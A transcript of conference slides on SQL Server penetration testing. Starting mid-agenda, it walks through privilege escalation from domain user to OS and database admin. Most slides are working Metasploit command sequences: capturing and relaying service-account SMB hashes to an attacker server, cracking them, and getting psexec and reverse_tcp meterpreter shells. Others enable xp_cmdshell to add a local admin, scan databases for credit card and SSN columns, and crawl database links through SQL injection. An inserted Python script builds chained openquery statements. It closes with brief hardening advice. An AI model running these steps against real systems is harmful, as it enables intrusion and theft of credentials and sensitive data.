    3. Database user → OS admin
    4. OS admin → Database admin
    5. Database admin → OS admin
    6. Finding sensitive data
    7. Escalation: Service accounts
    8. Escalation: Database Link Crawling
    9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary
    Unauthenticated Options
    • SQL injections
    • Weak passwords
    Authenticated Options (usually)
    • Other database servers
    • Unencrypted connection strings:
      ‒ Files
      ‒ Registry
      ‒ Network
    • ODBC connections
    • Client tools (priv inheritance)
  • 8. DOMAIN user → DATABASE user: Privilege Inheritance
  • 9. Privilege Inheritance: Summary
    The “Domain Users” group is often granted privileges to log in to SQL Servers…
    Evil users just need to:
    • Find SQL Servers
    • Verify Access
    • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access
    Test the current user’s access to SQL Servers with osql:
    FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"
  • 13. Privilege Inheritance: Verify Access
    Test an alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module:
    msfconsole
    use auxiliary/admin/mssql/mssql_sql
    set RHOST <IP RANGE>
    set RPORT <port>
    set USE_WINDOWS_AUTHENT true
    set DOMAIN <domain>
    set USERNAME <user>
    set PASSWORD <password>
    set SQL <query>
    run
    http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER → OS ADMIN: SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary
    Stored procedures with UNC support:
    ‒ *xp_dirtree
    ‒ *xp_fileexist
    ‒ xp_getfiledetails
    Possible SMB authentication attacks:
    Service Account         Network Communication   SMB Capture   SMB Relay
    LocalSystem             Computer Account        Yes           No
    NetworkService          Computer Account        Yes           No
    *Local Administrator    Local Administrator     Yes           Yes
    *Domain User            Domain User             Yes           Yes
    *Domain Admin           Domain Admin            Yes           Yes
    http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
    http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes
    Start the Metasploit SMB capture module on your evil server to capture seeded password hashes:
    msfconsole
    use auxiliary/server/capture/smb
    set CAINPWFILE /root/cain_hashes.txt
    set JOHNPWFILE /root/john_hashes.txt
    exploit
    http://www.metasploit.com/modules/auxiliary/server/capture/smb
    http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth
    Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI:
    msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN <domain>
    set USERNAME <user>
    set PASSWORD <password>
    set RHOSTS <IP RANGE>
    set RPORT <port>
    set SMBPROXY <evil server>
    run
  • 22. SMB Capture: Obtain Seeded Hashes
    Obtaining service account hashes from the SQL Server should look something like this:
    DOMAIN: DEMO USER: serviceaccount
    LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25
    NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e
    http://www.metasploit.com/modules/auxiliary/server/capture/smb
    http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes
    1. Crack the first half of the recovered LANMAN hash with the seeded half-LM rainbow tables:
    rcracki_mt -h 5e17a06b538a42ae ./halflmchall
    2. Crack the second half with John the Ripper to obtain the case-sensitive NTLM password:
    perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt
    http://www.metasploit.com/modules/auxiliary/server/capture/smb
    http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay
    SMB relay to a 3rd party with the SMB_Relay Metasploit exploit module:
    msfconsole
    use exploit/windows/smb/smb_relay
    set SMBHOST <targetserver>
    exploit
    If the service account has local admin privileges on the remote system, then a shell will be returned by the smb_relay module.
    http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth
    Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI:
    msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN <domain>
    set USERNAME <user>
    set PASSWORD <password>
    set RHOSTS <IP RANGE>
    set RPORT <port>
    set SMBPROXY <evil server>
    run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell
    If meterpreter then:
    • Type: shell
    • Type: osql -E -Q "whatever you want"
    If password:
    • Sign in via RDP
    • Open a cmd console
    • osql -E -Q "whatever you want"
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN → DATABASE ADMIN: SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary
    How can we go from OS admin to DB admin?
    • SQL Server 2000 to 2008
      ‒ LocalSystem = Sysadmin privileges
    • SQL Server 2012
      ‒ Must migrate to the SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec
    On SQL Server 2000 to 2008
    Execute queries as sysadmin with osql:
    psexec -s cmd.exe
    osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"
    Execute queries as sysadmin with SSMS:
    psexec -i -s ssms
    http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell
    Obtain a Meterpreter shell using the PSEXEC module:
    msfconsole
    use exploit/windows/smb/psexec
    set RHOST <targetserver>
    set SMBDOMAIN .
    set SMBUSER <user>
    set SMBPASS <password>
    exploit
    http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin
    Create a sysadmin in the database using the Metasploit mssql_local_auth_bypass post module:
    In Meterpreter type “background” to return to msfconsole. Then, in the msfconsole type:
    use post/windows/manage/mssql_local_auth_bypass
    set session <session>
    set DB_USERNAME <username>
    set DB_PASSWORD <password>
    exploit
    http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN → OS ADMIN: xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install
    Re-install xp_cmdshell:
    EXEC master..sp_addextendedproc "xp_cmdshell", "C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable
    Re-enable xp_cmdshell:
    sp_configure 'show advanced options', 1;
    reconfigure;
    go
    sp_configure 'xp_cmdshell', 1;
    reconfigure;
    go
  • 43. XP_CMDSHELL: Execute Commands
    Add a local OS administrator with xp_cmdshell:
    EXEC master..xp_cmdshell 'net user myadmin MyP@sword1'
    EXEC master..xp_cmdshell 'net localgroup administrators /add myadmin'
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
  • 46. Finding Data: TSQL Script
    Simple keyword search via TSQL!
    EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name, ''[?]'' as Database_name, Table_Name, Column_Name
    FROM [?].INFORMATION_SCHEMA.COLUMNS
    WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%''
    OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%''
    ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module
    Launching mssql_findandsampledata:
    msfconsole
    use auxiliary/admin/mssql/mssql_findandsampledata
    set RHOSTS <range>
    set RPORT <port>
    setg USE_WINDOWS_AUTHENT true
    setg DOMAIN <CompanyDomain>
    set USERNAME <username>
    set PASSWORD <password>
    set SAMPLE_SIZE <size>
    set KEYWORDS credit|social|password
    exploit
  • 49. Finding Data: Module Output
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram
  • 55. Shared Service Accounts: TSQL Script
    XP_CMDSHELL + OSQL = MORE ACCESS!
    EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"'
    More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-with-the-osql-utility/
  • 57. Database Link Crawling: Summary
    Database Links
    • Allow one database server to query another
    • Often configured with excessive privileges
    • Can be chained together
    • Use openquery() to query linked servers
    • Can be used to execute the infamous xp_cmdshell
    • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram
  • 59. Database Link Crawling: List Links
    How do I list linked servers? Two common options:
    sp_linkedservers
    SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links
    How do I list linked servers on a linked server?
    SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links
    How do I list linked servers on the linked server’s linked server?
    SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it!
    …You get the point. You can follow links until you run out.
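The nested openquery() statements on slides 59 to 62 follow one quoting rule (each level of nesting doubles the single quotes of the statement it wraps), and an auditor mapping how far a chain of links reaches needs to walk it without looping. This added Python example (not code from the presentation or the nullbind modules) builds the listing query for a link path of any length and walks a constructed link map; the server name WEB1, the DEMO_LINKS map and the demo_list_links() stand-in are assumptions made for the demo.

```python
"""Build and walk SQL Server database-link chains.

Added example, not code from the presentation or its Metasploit modules: it
generalises the nested openquery() statements of slides 59-62 to a link path of
any length and walks every reachable chain without looping. The server name
WEB1, the DEMO_LINKS map and demo_list_links() are constructed for the demo.
"""
from typing import Callable, Dict, Iterable, List, Sequence, Tuple

# Statement run on the last server of a path to list its links (slide 59).
LIST_LINKS_SQL = "SELECT srvname FROM master..sysservers"

Chain = Tuple[str, ...]


def quote_literal(sql: str) -> str:
    """Wrap a T-SQL statement in a single-quoted string literal.

    Every level of openquery() nesting doubles each single quote of the
    statement it wraps, which is why the quotes pile up in slide 61.
    """
    return "'" + sql.replace("'", "''") + "'"


def build_link_query(path: Sequence[str], inner_sql: str = LIST_LINKS_SQL,
                     select_list: str = "srvname") -> str:
    """Return the statement that runs inner_sql at the end of a link path.

    path is the ordered list of link names to hop through from the server you
    are connected to: [] runs inner_sql locally, ["DB1"] runs it on DB1, and
    ["DB1", "HVA"] runs it on HVA as seen from DB1 (slides 59 to 61).
    """
    sql = inner_sql
    # Wrap from the innermost hop outwards so the quote doubling compounds.
    for link in reversed(path):
        sql = f"SELECT {select_list} FROM openquery({link},{quote_literal(sql)})"
    return sql


def crawl_links(start: str,
                list_links: Callable[[Sequence[str]], Iterable[str]],
                max_depth: int = 10) -> Tuple[List[Chain], List[Chain]]:
    """Breadth-first walk of the link chains reachable from `start`.

    list_links(path) returns the srvname values visible at the end of path; a
    real implementation would execute build_link_query(path) on the connection.
    Returns (chains, loops): chains reach a server not yet on the path, loops
    point back to `start` or to a server already on the path (sysservers also
    lists the local server itself, so every hop yields at least one loop).
    Loops are recorded but never re-entered, so DB1 -> HVA -> DB1 terminates.
    """
    chains: List[Chain] = []
    loops: List[Chain] = []
    frontier: List[Chain] = [()]
    while frontier:
        next_frontier: List[Chain] = []
        for path in frontier:
            for link in list_links(path):
                chain = path + (link,)
                if link == start or link in path:
                    loops.append(chain)
                    continue
                chains.append(chain)
                if len(chain) < max_depth:
                    next_frontier.append(chain)
        frontier = next_frontier
    return chains, loops


# Constructed link map for the demo: each server's sysservers output, with the
# server's own entry first, as SQL Server reports it.
DEMO_LINKS: Dict[str, List[str]] = {
    "WEB1": ["WEB1", "DB1"],
    "DB1": ["DB1", "HVA", "WEB1"],
    "HVA": ["HVA", "DB1"],
}


def demo_list_links(path: Sequence[str]) -> List[str]:
    """Stand-in for running build_link_query(path) from WEB1: answers from DEMO_LINKS."""
    server = path[-1] if path else "WEB1"
    return DEMO_LINKS[server]


if __name__ == "__main__":
    reachable, skipped = crawl_links("WEB1", demo_list_links)
    for chain in reachable:
        print(" -> ".join(("WEB1",) + chain))
        print("   ", build_link_query(chain))
    print(f"{len(skipped)} loops skipped, e.g. {' -> '.join(('WEB1',) + skipped[-1])}")
```

The chain list is what an auditor compares against the intended link design; any chain that reaches a server the first hop was never meant to see is excessive reach.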
  • 63. Database Link Crawling: Exec Cmds
    How do I run commands on a linked server?
    SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')
  • 64. Database Link Crawling: Modules
    Two Modules
    1. Direct connection
    2. SQL Injection
    Available for Download
    • Not submitted to Metasploit trunk – Yet
    • Downloads available from nullbind’s github
      ‒ mssql_linkcrawler.rb
      ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules
    Features
    ‒ Crawl SQL Server database links
    ‒ Standard crawl output
    ‒ Verbose crawl output
    ‒ Output to CSV file
    ‒ Supports 32 and 64 bit Windows
    ‒ Global Metasploit payload deployment
    ‒ Targeted Metasploit payload deployment
    ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler
    Set up the multi/handler module:
    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport 443
    set ExitOnSession false
    exploit -j -z
  • 67. Metasploit Module: Link Crawler
    Set up the mssql_linkcrawler_sqli module:
    use exploit/windows/mssql/mssql_linkcrawler_sqli
    set GET_PATH /employee.asp?id=1;[SQLi];--
    set type blind
    set RHOST 192.168.1.100
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.130
    set lport 443
    set DisablePayloadHandler true
    exploit
  • 68. Database Link Crawling: Attack!
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
  • 76. Questions
    Antti Rantasaari Email: antti.rantasaari@netspi.com
    Scott Sutherland Email: scott.sutherland@netspi.com
    Blog: http://www.netspi.com/blog/author/ssutherland/
    Github: http://www.github.com/nullbind/
    Twitter: @_nullbind
    Presentation Slides: http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp-secusa2012